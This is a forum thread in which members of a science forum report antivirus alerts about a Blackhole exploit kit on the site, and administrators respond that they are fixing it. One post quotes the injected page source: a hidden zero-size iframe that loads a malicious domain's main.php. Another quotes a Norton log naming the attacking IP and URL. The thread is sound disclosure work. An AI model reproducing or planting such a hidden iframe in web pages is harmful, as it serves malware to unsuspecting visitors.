[Aethelwulf]

Every time I log on, the site tries to give my computer a virus. I thought I should let you know.

[JMJones0424]

For about the last 24 hours, I've had problems with this site. The following alert pops up and prevents anything but a white screen from scienceforums.com
I can get in through hypography.com and selecting forums, but still have the threat pop-up and problems with all parts of the forum loading.

OS is Windows Vista, problem occurs with IE, Firefox, and Chrome.

[LaurieAG]

It is called Web attack: Blackhole Toolkit website 14 and it comes from NETROUTING-AS Netrouting data facilities. Blocking 2.08.76.52.102 may help .

[LaurieAG]

208.76.52.102

[Aethelwulf]

Yes having the same problem, some parts of the site I can't enter and I can't even edit posts

[phillip1882]

yeah get the same error, how to block?

[LaurieAG]

Pull the site and clean it. The source below is from the page I am editing this post on now.

<iframe src="http://attentiongettingdokogeo.info/main.php" width=0 height=0 frameborder=0 style="display:none;"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Avg Showing Site As A Threat - Hypography Science Forums</title>
<link rel="shortcut icon" href='http://scienceforums.com/favicon.ico' />
<link rel="image_src" href='http://scienceforums.com/public/style_images/master/scienceforums.png' />
<script type='text/javascript'>

[Aethelwulf]

Sorry, but what do you mean, ''pull the site and clean it.'' I am computer illiterate see Can you take us step by step?

[Under the Rose]

This seems like as good a thread as any to let you know that today when I came to this forum, my Norton is advising me that we are under attack every time I load a page here. Also, the only way that I can get to a thread is by means of the subforum and the thread title. The links from who posted most recently only come up to a white page. Here is an image taken with my snip tool in case it is of any assistance.

Oh, yes, and the image link is not working but I believe the link will get you through to my Picassa Web image.

https://lh4.googleus.../Hypography.PNG

I am not having this problem on any of the other forums I post on although the same thing happened several months ago at one of them and the administrator was able to fix things. It will be deterring visitors to your thread, I am thinking, to be greeted by such things.

[LaurieAG]

Sorry Aethelwulf, I mean the administrators have to take the site off the internet, remove the offending code and see if the site remains unaltered.

[Tormod]

Thanks. This seems to be the same type of attack we had a while back. We're investigating.

[Tormod]

The immediate problem has been removed. The underlying problem may still exist, so we're investigating further. The site may need to be seriously updated, it has been a while now.

[Tormod]

Thanks. We have identified the problem.

[arKane]

Under the Rose is not the only one getting those intrusion attacks by Norton when clicking on a notification email link. I copied the more details and pasted below. If I copied the same link out of the email and had Norton check it it comes back saying it's safe. Also, this has only happened when accessing this forum.

Quote

Category: Intrusion Prevention Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description 2012-08-01 19:40:32,High,An intrusion attempt by 208.76.52.102 was blocked.,Blocked,No Action Required,Web Attack: Blackhole Toolkit Website 20,No Action Required,No Action Required,"208.76.52.102, 80",attentiongettingdokogeo.info/main.php,"PC (192.168.0.3, 54458)",208.76.52.102,"TCP, www-http" Network traffic from <b>attentiongettingdokogeo.info/main.php</b> matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE. To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.

This post has been edited by arKane: 02 August 2012 - 07:18 AM

[arKane]

I got the following notification email yesterday about 9:30 pm, but cannot find it in this topic for some reason.

Quote

Under the Rose has just posted a reply to a topic that you have subscribed to titled "The Great Spam Storm Of 13-14 July 2012".

----------------------------------------------------------------------
This seems like as good a thread as any to let you know that today when I came to this forum, my Norton is advising me that we are under attack every time I load a page here. Also, the only way that I can get to a thread is by means of the subforum and the thread title. The links from who posted most recently only come up to a white page. Here is an image taken with my snip tool in case it is of any assistance.

Oh, yes, and the image link is not working but I believe the link will get you through to my Picassa Web image.

https://lh4.googleus.../Hypography.PNG (https://lh4.googleus.../Hypography.PNG)

I am not having this problem on any of the other forums I post on although the same thing happened several months ago at one of them and the administrator was able to fix things. It will be deterring visitors to your thread, I am thinking, to be greeted by such things.
----------------------------------------------------------------------